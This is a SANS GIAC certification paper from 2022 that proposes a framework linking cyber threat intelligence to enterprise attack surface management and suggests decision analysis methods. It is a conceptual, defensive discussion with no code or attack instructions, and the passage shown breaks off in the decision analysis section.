ts

gh
Threat Intelligence-Driven Attack Surface

Ri
Management

ll
Fu
GIAC (GCTI) Gold Certification

ns
ai
Author: Jonathan Matkowsky, [email protected]

et
Advisor: Hamed Khiabani, Ph.D.

rR
Accepted: July 25, 2022

ho
ut
,A
Abstract
te
itu

Defenders struggle to keep up with the pace of digital transformation in the face of an
st

expanding modern enterprise attack surface and more sophisticated adversaries. A

In

conceptual framework for relating attack surface management (ASM) to vulnerability

management and cyber threat intelligence (CTI) improves cyber defense. The framework
NS

explains how ASM improves cyber resiliency in proactively detecting and responding to
weaknesses that adversaries could exploit to cause unacceptable harm. Defenders should
SA

prioritize ASM aligning with the business continuity and enterprise risk management
functions. A CTI-driven ASM conceptual framework (CTI-ASM) helps defenders achieve
e
Th

decision clarity on how best to prioritize preventing the most impactful exploitations
based on adversaries’ capabilities, opportunities, and intent. Security researchers have
22

applied decision analysis methodology to solve various security challenges generally.

Applying decision analysis methodology to CTI-ASM may improve the quality of its
20

implementation and support higher quality CTI. Potentially helpful decision analysis
tools and concepts include relevance diagrams, possibility and probability trees,
©

sensitivity analysis, corporate risk attitudes, weighing imperfect information, and

accounting for cognitive biases.

© 2022 The SANS Institute Author retains full rights.

 ts
Threat Intelligence-Driven Attack Surface Management 2

gh
Ri
1. Introduction

ll
This commentary suggests that a cyber threat intelligence (CTI)-driven attack

Fu
surface management (ASM) conceptual framework (CTI-ASM) may improve cyber

ns
resiliency against a continuously expanding enterprise modern attack surface (AS) and

ai
more sophisticated adversaries.

et
After discussing desirable features of CTI-ASM and possible technical tools,

rR
methods, and architectures to implement CTI-ASM, the commentary suggests that

ho
applying decision analysis methodology (DA) could improve both CTI-ASM and CTI.

ut
DA is a scientific method combining systems analysis and statistical decision theory for

,A
making rational decisions in complex, dynamic, and uncertain situations. (Howard &
Matheson, 1989).
te
itu

Security researchers have applied DA to physical security systems (Lin et al.,

st

2009), document trustworthiness (Bong et al., 2012), hardware security, counterfeit

In

electronics detection, cyber system upgrades and maintenance (Collier et al., 2014), and
NS

intrusion detection architectures (Zbakh et al., 2015). They have more recently applied
DA with graph analytics for cyber system resiliency (Dwivedi, 2018), rank-weight
SA

methods for multi-criteria decision analysis (Gourisetti et al., 2020), dynamic information
e

processing (Hong, 2020), and simulations to improve risk thinking (Shreeve et al., 2021).
Th
22

2. A glimpse of the enterprise attack surface

20

The AS is the enterprise’s weaknesses in its security procedures and internal

©

controls that adversaries want to exploit. (NIST, 2011a, p. b11).

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 3

gh
Ri
Fig. 1. Woodall, T. (2022). Modern Day AS. JPEG File.
Adversaries target any business units or functions within the enterprise to obtain

ll
Fu
unauthorized data access or disrupt services. (NIST, 2012b). The targeted AS not only
includes valuable data, intangible assets, and intellectual property more generally but also

ns
machine learning (ML) and artificial intelligence (AI), which as adversarial failures in

ai
et
ML and AI increase, will become more pressing (cf. Microsoft, 2020). By viewing the

rR
AS from the adversaries’ perspective [Fig. 1, supra], defenders may find the path of least
resistance that adversaries will target. The path of least resistance is any initial trajectory

ho
by which adversaries start causing harm through flaws discovered externally in enterprise

ut
assets. Other external forms of vulnerability require more than passive scanning—

,A
interactive probing or exchanging communications to spot weaknesses, such as social
te
engineering used in penetration testing.
itu

Assets partly define the AS within the established points that an adversary can
st

influence, access, or change to the possible detriment of the enterprise's mission, aims,
In

and priorities (cf. Barrett, 2018, p. 14). The AS is dynamic, though. It includes anybody,
NS

any place, and anything that is either supporting operations or furthering the strategic
SA

direction that the system is interacting with or connected to; this includes embedded
e

processors and controllers, telecommunication networks, and parts of the Internet. (Stine
Th

et al., 2021, p. 18; Joint Task Force, 2018, p. 16; NIST, 2011a, pp. 1, b3; NIST, n.d.).
22

Much like people and software they write, prone to errors, are targeted to get a
20

stronger foothold into an organization, supply chain systems are also part of the AS.
Protecting high-confidence bodies of training data, for instance, is a supply chain issue:
©

engineers reuse models trained by others because training algorithms are resource-
intensive (Microsoft, 2022h; Shankar et al., 2020). MITRE ATLAS case studies illustrate
how adversarial ML techniques can cause considerable damage to production ML.
(MITRE, n.d.).
Supply chain systems may integrate several technologies running on cyber-
physical infrastructures and digital system components (Yeboah-Ofori et al., 2021). It is
not just high-level systems. Post-SolarWinds (CVE-2021-35244, 2021), defenders should
secure the supply chain using software vulnerability assessment tools like MITRE’s
Software Assurance Platform (MITRE, 2022). Also, code vulnerabilities, such as from

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 4

gh
Ri
open-source software repositories relied on by developers, are part of the AS. (Microsoft,
2021c, p. 74; Wilburn & Schmidt, 2022).

ll
Fu
Finding the confines of a system affected by vulnerabilities is challenging because
it requires understanding what it means for one system to be part of another. (Spring,

ns
2022).

ai
et
rR
3. Challenges of protecting the attack surface

ho
Defenders struggle to keep up with the pace of harmful cyber activity converging

ut
with the speed of digital transformation.

,A
Cyber risk is already perceived ubiquitously as a top enterprise risk. (Kumar,
te
2022). Moreover, the number of incidents is only rising in tandem with a broadening
itu

range and increasing severity of harm. (Silver, 2021).

st

Some say that before the Covid-19 outbreak, a business suffering a security
In

breach could permanently lose anywhere from twenty to forty percent of its customer
NS

base. (PCI Pal, 2019). As a result of the Covid-19 outbreak, organizations are even more
SA

vulnerable to cyber threats (McAfee & FireEye, 2021). They rushed to move their
operations online. (HBR, 2021, p. 2). “With legions of employees working from home
e
Th

and business processes quickly digitized, corporate information technology systems and
22

data stores suddenly grew in size and complexity, offering an expanded and enticing
[AS].” (HBR, 2021, p. 2). Global digital transformation is accelerating faster than during
20

the height of the pandemic and will likely continue for at least the next several years.
©

(IDC, 2022b).

The continued extension of enterprise boundaries and increased asset movements

expands the AS. For instance, the dramatic rise in remote access services and virtual
private network (VPN) usage during the Covid-19 pandemic made specific organizations
more vulnerable. (cf. Ginty, 2022). According to the advisories cited in ZDnet, the
increased vulnerabilities stemmed from organizations that patched or updated VPNs
relatively infrequently, neglected multi-factor authentication, or resorted to trying to
protect insecure services behind non-standard ports that adversaries could scan.
(cf. Ginty, 2022).

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 5

gh
Ri
In addition, corporate data infrastructure and applications now run across multiple
clouds and hybrid environments (Badhwar, 2021, p. vii). As a result, even state-of-the-art

ll
Fu
firewalls and detection systems cannot alone safeguard corporate systems or
infrastructure behind a moat; the enterprise would remain connected to the Internet.

ns
(cf. Doerr, 2021). Furthermore, traditional perimeter defenses do not prevent adversaries

ai
et
from moving across the enterprise or steadily increasing access and control. (Doherty

rR
& McKenney, 2021, p. 1).

ho
The Internet has progressively and effectively become the new perimeter.

ut
(Sargent, 2022; Rose et al., 2020, p. 1).

,A
In addition, supply chain attacks prey on the fabric of mutual trust and
te
dependencies supporting the economy, such as NOBELIUM SolarWinds and HAFNIUM
itu

on-premises Exchange Server attacks (Microsoft, 2021c, pp. 1, 48, 58). Also, rapid and
st

widespread adoption of the Internet of Things and operational technology—from smart

In

speakers to voice-over-Internet protocol-connected printers (cf. Hallum, 2021)—

NS

contributes to a much larger and more complicated AS. In addition, programmable

SA

systems and devices now regularly directly or indirectly interact with physical
environments, including industrial controls, building management and physical access
e
Th

control, and environment measurement systems. (NIST, n.d.).

Adversaries may now control cyber-physical systems—oil and gas pipelines,

22

electrical power, autonomous vehicles, drones, traffic flow, transit systems, and even
20

biological implants. (cf. Microsoft, 2021c, pp. 71, 79, 82). For instance, critical security
©

vulnerabilities in certain Chinese-made MiCODUS MV720 GPS trackers that are

currently being used in over a hundred and fifty countries by businesses across a wide
range of industries as well as by military, law enforcement, government agencies and
even a nuclear power plant operator, can easily be exploited remotely to fully control
GPS, disarm vehicle alarms, change their routes, and cut off their fuel. (Ahmed, 2022).

“The amount of potential attack surfaces, attack vectors, and avenues for cyber-
physical attacks is practically infinite.” (Hamilton, 2021). This control is partly why
ransomware payments in the United States have soared—hundreds of millions yearly.
(WSJ, 2022). There is potential for mass breaches of sensitive information and

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 6

gh
Ri
exploitations of critical memory allocation vulnerabilities that can crash systems across
many industries and verticals. For example, Cobalt Strike, commonly used in the public

ll
Fu
and private sector as a penetration testing platform to test a firm’s resiliency, has been so
widely deployed by adversaries that RiskIQ detects a command-and-control (C2) server

ns
more than hourly. (Ginty, 2022). Vulnerable end-of-life, unpatched, expired services and

ai
et
open ports are continuously in plain sight. (Ginty, 2022).

rR
Because there is no longer a single, easily identified perimeter for the enterprise,

ho
maintaining visibility requires an intentional extension of focus to monitor the

ut
proliferation of mobile devices, Bring Your Own Device, Internet of Things, and cloud

,A
computing. (Stine et al., 2020, p. 17). In addition, because most organizations embrace a
te
multi-cloud strategy, there is a growing AS of multi-cloud deployments of container
itu

technologies—virtual machines running “containers” of microservices and their packaged

st

dependencies and configurations (e.g., Kubernetes and Docker). (CTID, 2021a).

In

Unsurprisingly, organizations proactively managing their AS typically find

NS

approximately thirty percent more assets than they knew they owned. (Microsoft, 2022g).
SA

And the metaverse may be the surge on the horizon. The next generation of the
Internet beyond mobile and Web in an autonomous virtual shared space amplifies the
e
Th

existing AS. Devices that can be used as entry points threaten safety in the physical world
through massive data streams and sensors collecting brain wave patterns, facial
22

expressions, eye movements, hand movements, speech, and biometric features (Wang et
20

al., 2022). The metaverse blurs digital and physical boundaries. As a result, protecting
©

against Deepfake events will be more challenging, along with new challenges of
compliance, privacy, identity, and trust management. (Wang et al., 2022).

3.1. Sophisticated adversaries

Not only has the AS expanded and continues to expand but also, we now face
sophisticated adversaries. They are not only compromising assets supporting business
operations (Joint Task Force, 2018, p. 119) but explicitly targeting critical infrastructure,
like crippling or holding hospitals hostage. (WSJ, 2022).

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 7

gh
Ri
Also, these days, state actors want to infiltrate vital institutions in the public
sector and private sector businesses that everyday households and local communities

ll
Fu
depend on for their personal and financial wellbeing. (cf., The White House, 2021).

ns
Even non-state actors regularly deploy advanced anti-forensics and can more

ai
precisely target our weakest points (Dehghantanha et al., 2019, pp. 3, 165). They steal

et
business model algorithms and inject payloads through mobile apps that poison deep

rR
learning models impairing child safety (Yale & Zonghao, 2021). They also target ML

ho
models widely used for cyber defense. (Beek, 2020). RiskIQ blocklists a newly detected

ut
malicious mobile app every five minutes (Microsoft, 2022f) and more than half a million

,A
new pieces of malware daily. (Ginty, 2022). Threat actors change their playbooks often,
te
use sophisticated anonymization, and commoditize sophisticated attack kits. (Microsoft,
itu

2021c, pp. 1, 8-9, 20). Some of these attacks begin and end within as little as an hour or
st

two. (Microsoft, 2021c, p. 23).

In

Last year alone, Microsoft observed more than ten billion malware threats, more
NS

than thirty-five billion phishing, other malicious emails, and over nine hundred brute
SA

force password theft attempts every second. (Jakkal, 2022). Cybercrime will cost over ten
trillion U.S. dollars annually by 2025. (Jakkal, 2022). Imagine if these costs could be
e
Th

avoided. It would be enough money for the U.S. government to distribute an annual
stimulus check for nearly thirty thousand dollars to every person in the United States.
22

(cf. CIA, n.d.).

20

Russian Federation’s attack on Ukraine and the resulting war further wrenched
©

cyber preparedness throughout Europe and the United States. European Chief
Information Security Officers (CISOs) are reassessing well-developed supply chain
security guidelines and are concerned they need stronger cyber resilience due to the war.
Likewise, almost half of U.S. CISOs expect to increase network protection because of the
war. (IDC, 2022a).

4. Attack surface management

With continuously expanding attack surfaces and more sophisticated adversaries,
a “zero trust” paradigm now defines security aims (Rose et al., 2020, p. 4). This paradigm

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 8

gh
Ri
requires continually analyzing and evaluating risks to corporate identities, devices,
applications, data, networks, infrastructure, and business functions under the assumption

ll
Fu
that the adversary is present in the environment. (Rose et al., 2020, p. 1; Microsoft,
2021c, p. 48). After all, incomplete knowledge of deployed systems and their patch state

ns
makes organizations more vulnerable to sudden large-scale attacks. (Microsoft, 2021c,

ai
et
p. 48).

rR
Because of the continuously expanding AS and more sophisticated adversaries,
insurance providers may expect continuous assessments and dynamic analysis to decide

ho
premiums and proper coverage. (cf. Badhwar, 2021, p. 328). Also, given the challenge of

ut
protecting an enterprise from harmful cyber activity, public companies must consider the

,A
impacts of foreseeable cyber breaches, anecdotally exemplified by Bridgestone and
te
Toyota choosing to proactively shut down parts of operations until they could better
itu

understand how cyber risk was affecting their operations. (Harvard, 2022).
st
In

Gone are the days when protecting the perimeter through antivirus, firewalls, and
NS

log management suffice. Nonetheless, many defenders struggle to integrate a myriad of

solutions to adjust to this complex environment because “[t]here is often a divide
SA

between business/mission owners and security/technology management.” (Souppaya &

e

Karen, 2022).
Th

ASM enables an organization to achieve and maintain an acceptable level of loss

22

exposure cost-effectively (Freund & Jones, 2014, chap. 14) by combining practices and
20

measures to achieve organizational aims as a management system (cf. Kazmi &

©

Naarananoja, 2014, p. 97). ASM helps protect against decentralized and independent
solutions whose architectures and records are not optimally compatible with performance
measurement. Performance measurement is an essential element of ASM reporting
progress and finding gaps. (cf. Kazmi & Naarananoja, 2014, p. 98).

4.1. Vulnerability scanning and patch management

Enterprise vulnerability scanning and patch management (VuM) lays the
foundation of ASM and supports defenders striving to proactively spot mismanaged
resources before adversaries can use them for harmful cyber activity. Misconfigurations

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 9

gh
Ri
are often a root cause of compromised systems. (Diogenes & Shinder, 2018, Ch. 1).
“Indeed, Gartner predicts that by 2025, more than 85% of successful attacks against

ll
Fu
enterprise users will exploit configuration and user errors in legacy systems.” (Gartner,
2021a, p. 4).

ns
ai
4.2. Business continuity and enterprise risk management

et
Defenders may gather insights from the business continuity management (BCM)

rR
function on how and what to prioritize protecting, especially for evaluating and

ho
considering the probable frequency and size of acceptable future losses (Freund & Jones,

ut
2014; ISO, 2020, p. 2). For example, BCM may help to define the types of and the extent

,A
to which disruption is tolerable across a range of possible negative consequences for the
te
organization: reputational damage, operational harm, contractual damages, monetary loss,
itu

legal repercussions, regulatory fines, and failure to deliver on business goals or lost
st

business opportunities. (ISO, 2020, pp. 4, 22).

In

In addition, ASM may gain insights from the enterprise risk management (ERM)
NS

function within the organization (Joint Task Force, 2018, p. iv, Stine et al., 2020, p. 4).
SA

Evaluating the criticality and sensitivity of enterprise assets shapes the proper risk
tolerance. (Stine et al., 2021, p. 18). Coordinating with ERM would help ensure risk
e
Th

alignment of resources with the organizational mission and vision and may help ERM
protect shareholder value. (COSO, 2017, pp. 2, 5).
22

Coordinating with ERM is also important because cyber risks interlock with
20

various other types of enterprise risks. (cf. NIST, 2016c). “[Such] incidents can have
©

operational, financial, reputational, and strategic consequences for the organization —

and these incidents are growing in number and cost.” (Gartner, 2021b, p. 1).
To fortify business goals and aims, ASM relies on senior leadership to define
mission priorities, proper capital and operating expenses, and adequate risk appetite and
tolerance. (Stine et al., 2021, pp. 11, 15). In addition, turning to senior leadership is the
only way to decide how to protect business assets based on their value to the business and
the expected risk. (Open Group, 2021).

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 10

gh
Ri
4.3. Continuous Visibility
Whether continuous visibility comes from a mature VuM program as part of ASM

ll
Fu
or from ASM software and managed services, ASM requires constant visibility into all

ns
the enterprise endpoints and assets. ASM focuses on managing adversaries' uncertain
potential negative impact, understanding how adversaries exploit vulnerabilities, and

ai
et
neutralizing the exploitations by reducing the AS. (Smith, 2022).

rR
Assets include embedded devices and servers, cloud services, source code, pre-

ho
deployed code, software platforms, virtual machines, applications, and their dependencies
and sources, components, operating systems, firmware, and which software and versions

ut
,A
those assets run down to the level of package and libraries (Souppaya & Karen, 2022;
Diamond et al., 2022).
te
itu
For instance, ASM should supply continuous visibility of cloud assets across a
multi-cloud environment to spot any misconfigurations or vulnerable components and
st
In

understand how a potential adversary may try to exploit them. (Estrin, 2022). After all,
adversaries weaponize cloud resources to harm other target systems because of poor
NS

security hygiene, such as sharing public key secrets in a public cloud. For instance, bots
SA

will scan for keys leaked into log files on Continuous Integration and Continuous
e

Delivery (CI/CD) services used for automation in building, testing, and deployment of
Th

applications and in Git repositories, such as GitHub, to steal these keys (Diogenes &
22

Shinder, 2018, Ch. 1).

ASM includes the “activities, technology and managed services deployed to
20

discover internet-facing enterprise assets and systems and associated vulnerabilities” that
©

adversaries would want to exploit (Shoard & Handa, 2021, p. 10)—even before any
intrusion, during the reconnaissance stage. (Hutchins et al., 2011). Otherwise,
adversaries may be trying to maintain persistence or act on their objectives by the time
they are detected. ASM organizes information enabling decisions on how to address the
threats of adversaries’ uncertain potential adverse impact and improve continuously.
(Barrett, 2018, p. 6).
For example, defenders may prefer integrating relevant detection queries based on
ASM priorities into an extended detection and response (XDR) solution with security
orchestration, automation, and response (SOAR) capabilities. (Microsoft, 2020). This

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 11

gh
Ri
integration would use automation and ML or hunter-trained AI to collect, correlate, and
analyze relevant data across the enterprise environment—including endpoints, email

ll
Fu
traffic, applications, virtual machines, and identities.
After all, to meet the increased demands for digital interfaces and services and

ns
support a hybrid work environment, ASM must use expert-assisted AI, ML, and

ai
et
automation to effectively manage security risks at scale. (HBR, 2021, pp. 4, 8). For

rR
instance, ASM may automatically surface and apply mitigation to vulnerable devices,
software, files, and container images running in the cloud that use an affected Log4j

ho
component. (Microsoft, 2021f).

ut
Defenders should also be able to discover attack surfaces in website paths and

,A
covert vulnerabilities in payloads with ASM. (cf. Yan et al., 2022). In addition, ASM
te
software should be able to consolidate AS vectors from multiple scanners to detect cross-
itu

site scripting vulnerabilities and other security issues in Java web applications and PHP
st

web application vulnerabilities. (Yan et al., 2022).

In

With ASM, defenders identify a broad range of technical vulnerabilities used to

NS

gain initial access and non-technical vulnerabilities, such as exposed personal or access
SA

information in open-source data (Roy et al., 2022). ASM then helps contextualize how
e

specific vulnerabilities from across the host, application, and network layers, when
Th

sequentially combined, become more effective for the adversary (Roy et al., 2022; Spring
22

et al., 2021).
20

ASM should illuminate what the adversary would target during the
reconnaissance stage (Hutchins et al., 2011) when trying to infiltrate the organization.
©

(Shoard & Handa, 2021, p. 4). This ASM feature is sometimes called “External ASM”
(Microsoft, 2021e). External ASM can detect vulnerabilities that the adversary would
want to use to gain an initial foothold and drop remote access toolkits, activate hands-on-
keyboard attacks, exfiltrate data, and deploy ransomware through libraries on devices,
software files, and components. (cf. Microsoft, 2022d)

5. Threat intelligence-driven attack surface management

ASM alone does not measure whether adversaries commonly exploit an exposure
or whether a vulnerability is well-known. In addition, it does not explain the degree of

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 12

gh
Ri
control or the benefit that the adversary would stand to gain, how easy it would be to get
started, the specific impacts on human safety, if applicable, or the company’s mission.

ll
Fu
(Spring, 2022).
Even after fine-tuning ASM based on BCM and ERM inputs, it appears from

ns
computational modeling applicable to modern systems that programmers cannot produce

ai
“a pragmatically useful piece of software…without vulnerabilities,” which are “countably

et
rR
infinite.” (Spring, 2022, pp. 11-12). Therefore, the technical details of specific
vulnerabilities are not as helpful without understanding which vulnerabilities are likely to

ho
be used at any exact time and in a particular organization (Spring, 2022, p. 17). CTI-

ut
ASM helps contextualize how to prevent vulnerabilities from being exploited beyond the

,A
technical severity offered through Common Vulnerability Scoring System (CVSS).
te
Also, teams cannot focus on all threats, or they will get burned out. (Godyla &
itu

Nickels, 2021). With CTI-ASM, defenders can use CTI assessments to prioritize
st

vulnerabilities based on understanding the adversaries' capabilities, opportunities, and

In

intent in conducting their harmful cyber activity. (cf. Brown & Lee, 2021).
NS

CTI aids defenders in understanding the chronology of harmful cyber operations

SA

in the context of monitoring across endpoints, identities, and applications—both in the

e

public and private cloud and hybrid. (cf. Microsoft, 2021b). This way, defenders can not
Th

only detect and block malicious components of a single operation but also of a campaign
22

and follow-on campaigns. (cf. Microsoft, 2021b).

20

CTI-ASM also reflects a conscientious effort to reduce methodical and perceptive

biases in making judgments and analyzing evidence (cf. Heuer 2019, pp. 111-72).
©

Accordingly, it includes an “audit trail” of interpretations (Heuer, 2019, p. 109), presents

assumptions and sequences of extrapolations, shows the level and basis of hesitation, and
reveals and explains other viewpoints. (Heuer 2019, p. 16).
Similarly, Charles T. Munger, Warren Buffet’s partner in running Berkshire
Hathaway, noted that Darwin’s impact on science was due in considerable measure to
prioritizing any evidence tending to undermine whatever cherished and hard-won theory
he already had. (Davis, 2009). According to Mr. Munger, Einstein also partially
attributed his successful views to self-criticism, which Mr. Munger explained means
testing and destroying his well-loved ideas. (Davis, 2009) CTI-ASM (including

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 13

gh
Ri
embedded AI and ML) should similarly be self-critical, continuously striving to find
evidence to confirm the weaknesses in any of its insights or convictions.

ll
Fu
Process-wise, CTI production starts with collecting and evaluating cyber threat
information in its source and reliability through rigorous and structured tradecraft

ns
techniques using all-source knowledge and substantive experience. (Security Intel, n.d.).

ai
It is an “intelligence-driven” method to detect rapidly, respond to, and recover from

et
rR
threat events aimed at safeguarding assets (Stine et al., 2021, p. 26). CTI-ASM collects
information on threats and threat actors from various technical and human means (Kriaa

ho
& Chaabane, 2021, p. 113) and expresses this comprehension in a structured way using

ut
proper analysis techniques. (Schaberreiter et al., 2019).

,A
CTI-ASM is cyclical. Data collection is planned, implemented, and evaluated
te
using systematized analytic skills. It distributes and reevaluates the resulting intelligence
itu

based on feedback from a wide range of data collection sources, such as Kusto Query
st

Language (KQL) queries (Microsoft, 2022c) for unusual processes that may have
In

launched on a protected endpoint, and more current knowledge. Finally, CTI-ASM

NS

restructures the collection and fills intelligence gaps. (cf. Security Intel, n.d.). Human
SA

experts assist AI and ML in CTI-ASM to promptly inform decision-makers, based on the

e

evidence, about proactive and reactive cyber defensive measures. (cf. CIS, 2021a).
Th

CTI-ASM derives actionable insights into how adversaries plan, conduct, and
22

sustain their operations. It engages in direct attribution or profiling the type of threat actor
20

using a robust and reliable set of considerations. CTI-ASM decides the malicious
activity’s scope, origin, and direction, assesses a timestamp, and evaluates the adversarial
©

goals, aims, and TTPs (tactics, techniques, and procedures). (Mavroeidis et al., 2021,
p. 328).
CTI-ASM streamlines the collection and processing through automation that frees
up analyst time needed to use CTI for awareness of the AS. (cf. Brown & Lee, 2019, p.
15). For instance, last year, local governments found they could cut down the time
needed to take defensive measures from days to a few minutes by taking part in a pilot
project testing an automated data feed of potential network compromises. (CIS, 2021a).
This speed tends to be critical when dealing with hybrid attacks across multiple domains.
For instance, blocking an adversary in the cloud from running malicious code on an

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 14

gh
Ri
endpoint will not stop the attacker from doing it again if they already have gained
persistence in the cloud. However, automation tools, fusing actionable intelligence across

ll
Fu
domain boundaries, remediating all affected assets, and improving the security
configurations prevent a recurrence. (Microsoft, 2022a).

ns
Applying ML techniques and algorithms to CTI properties can improve the

ai
et
accuracy of threat prediction analysis and hypothesis generation (Elitzur et al., 2019,

rR
p. 47). Such an application also helps find foreseeable vulnerabilities in the supply chain
(e.g., ransomware and spear-phishing) and helps to apply reasonable controls. (Yeboah-

ho
Ofori et al., 2021). In addition, ML and data mining have successfully analyzed malware

ut
and detected anomalous networks, including analyzing Border Gateway Protocol

,A
behavior. (Dehghantanha et al., 2019, pp. 3, 67). Similarly, Microsoft uses statistical
te
methods to track threat actors and TTPs (Microsoft, 2021a).
itu

Therefore, CTI-ASM includes the application of AI and ML to recognize, absorb

st

and act wisely against more advanced forms of harmful cyber activity. (Dehghantanha et
In

al., 2019, p. 3). ML derives risk scenarios from potential threats and vulnerabilities in
NS

crucial assets contributing to the AS. CTI-ASM will assess the derived risk scenarios on
SA

their impacts and frequency of effects. (Stine et al., 2021, pp. 32-33).
e

CTI sources include commercial subscriptions, automated data feeds, sector-

Th

specific sharing of indicators of compromise and alerts, industry-specific threat models,

22

and knowledge bases of observed adversary tactics and techniques. (Stine et al., 2021,
20

p. 26).
CTI formats in CTI-ASM include frameworks, standards, scoring, and
©

enumerations. For example, MITRE ATT&CK (MITRE, n.d.) supplies an overview of

specific threat characteristics. STIX2.1 (Structured Threat Information Expression)
Course of Action (CoA) objects is a standard for describing threats, attacks, and the
facets of security incidents. CVSS supplies metrics for assessing the implications of
artifacts. Common Weakness Enumeration (CWE) supplies enumerations and unique
identifiers for specific artifacts. (Schlette & Pernul, 2021, pp. 2527-28).
Using the open-source tool ATT&CK Workbench, an organization may manage
and extend their local version of ATT&CK and keep it coordinated with MITRE’s
knowledge base to align CTI-ASM with the knowledge base. (cf. CTID, 2021b).

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 15

gh
Ri
CTI-ASM may ingest real-time CTI indicator feeds by using the Trusted
Automated Exchange of Intelligence Information (TAXII) application protocol for

ll
Fu
transmitting STIX data from a TAXII server (cf., CIS, 2021d). It also uses “attacker
behavior modeling” to understand attack schemes and improve detection and analytic

ns
competencies. (cf. Elitzur et al., 2019, p. 41). Using threat modeling, CTI-ASM helps

ai
et
focus on what an adversary wants to target (cf. Godyla & Nickels, 2021), such as by

rR
generating probabilistic attack graphs using CTI data. (Gylling et al., 2021). These graphs
have successfully stopped ransomware actors just two minutes into an attack. (Microsoft,

ho
2021a).

ut
A CTI-ASM architecture of an XDR solution with SOAR capabilities based on

,A
zero trust architecture supplies cyber-situational awareness of events (Doherty &
te
McKenney, 2021, p. 3) to reduce the AS. This CTI-ASM architecture continuously
itu

watches assets for insights and anomalous patterns. (cf. Open Group, 2021). In addition,
st

it grows telemetry to have increased visibility of the evolving relevant holdings of all
In

types. (cf. Open Group, 2021). Furthermore, it prioritizes based on risk analyses informed
NS

by current information on active threat actors and technical attack techniques. (cf. Open
SA

Group, 2021).
e

By understanding attack flows rather than focusing on one specific action at a

Th

time, CTI-ASM helps to compose realistic adversary simulation scenarios (cf. CTID,
22

2022). In addition, understanding the impact of CVEs (Common Vulnerabilities and

20

Exposures) through the lens of ATT&CK adversary behaviors within CTI-ASM may
help supply the necessary context. (CTID, 2021c). Specifically, how adversaries use
©

specific vulnerabilities to achieve their goals helps prioritize those vulnerabilities

according to the actual risk in the defender’s environment. (CTID, 2021c).
The increased situational awareness from CTI-ASM helps minimize the enterprise
AS (Mavroeidis et al., 2021, p. 328). By swiftly connecting observed behaviors and
characteristics to threat actors, CTI-ASM may supply indispensable insights that can
enable organizations to counter attacks because how an attack progresses will depend on
the adversarial goals and TTPs. (Microsoft, 2021a). For instance, if an election office
shares a malicious IP (Internet Protocol) address through an indicator sharing program,

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 16

gh
Ri
other election offices use a firewall block list and prevent the same attack within seconds.
(CIS, 2021b).

ll
Fu
By deploying CTI-ASM, defenders may apply AS reduction rules in a SIEM
(Security Information Event Management) or XDR to help prioritize vulnerabilities and

ns
misconfigurations to block entry vectors and lateral movements more effectively

ai
et
(Microsoft, 2022i; Microsoft, 2022d). For instance, CTI-ASM may apply AS reduction

rR
rules to critical remote code execution vulnerabilities discovered in specific versions of
Apache’s Log4j software library (Log4Shell) that adversaries use to take control of many

ho
affected systems. (CISA, n.d.). In addition, CTI-ASM may inform defenders of incidents

ut
that may need more scoping. (Microsoft, 2022d).

,A
CTI-ASM may curate threat indicator feeds using a CTI platform that loads into a
te
SIEM or XDR-SOAR (Microsoft, 2021d) to provide context for understanding how to
itu

improve resiliency with artifacts and other telemetry data.

st

There are tools to enrich and help visualize CTI-ASM data, such as the msticpy
In

set of Python tools (MSTIC, 2021). Much of the msticpy package is agnostic to the data
NS

source. For example, Microsoft designed msticpy for use in Jupyter notebooks. Jupyter is
SA

an interactive development and data manipulation environment hosted in a browser that

e

returns the output of code it executes from what a user types into a cell. (Microsoft,
Th

2019).
22

Msticpy includes data providers and pre-built queries for easy access to security
20

data stores, CTI, and geo-location queries to supply context (e.g., clustering, time series
analysis, anomaly identification, base64 decoding, and IOC pattern extraction). With
©

msticpy, CTI-ASM analysts can pivot to derive additional indicators for additional
context and use the CTI lookup class to search for an individual or multiple indicators of
compromise (IOC) from one or more CTI providers. Msticpy also includes mechanisms
to visualize event timelines, process trees, mapping, charts, and time series. (Microsoft,
2019).

6. Applicability of decision analysis

Analysts may apply several DA concepts to improve the quality of CTI and CTI-
ASM.

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 17

gh
Ri
DA tools may help ensure that CTI-ASM incorporates an appropriate risk attitude
(cf. Howard & Abbas, 2016, ch.11). They also help ensure that CTI-ASM priorities

ll
Fu
reflect a unified corporate risk tolerance and not the risk tolerance of only specific
individuals within an organization. (Howard & Abbas, 2016, pp. 781-85). The risk

ns
tolerance of specific individuals differs depending on where the individual sits. (Howard

ai
et
& Abbas, 2016, pp. 781-85). While there may be a significant first struggle to gather the

rR
relevant risk information and organizational data, this material can be resourcefully
reused and only refreshed intermittently. (Spring, 2022).

ho
DA relevance diagrams may help understand the current state of information and

ut
assert irrelevance relations to avoid logical errors in assessments. (cf. Howard & Abbas,

,A
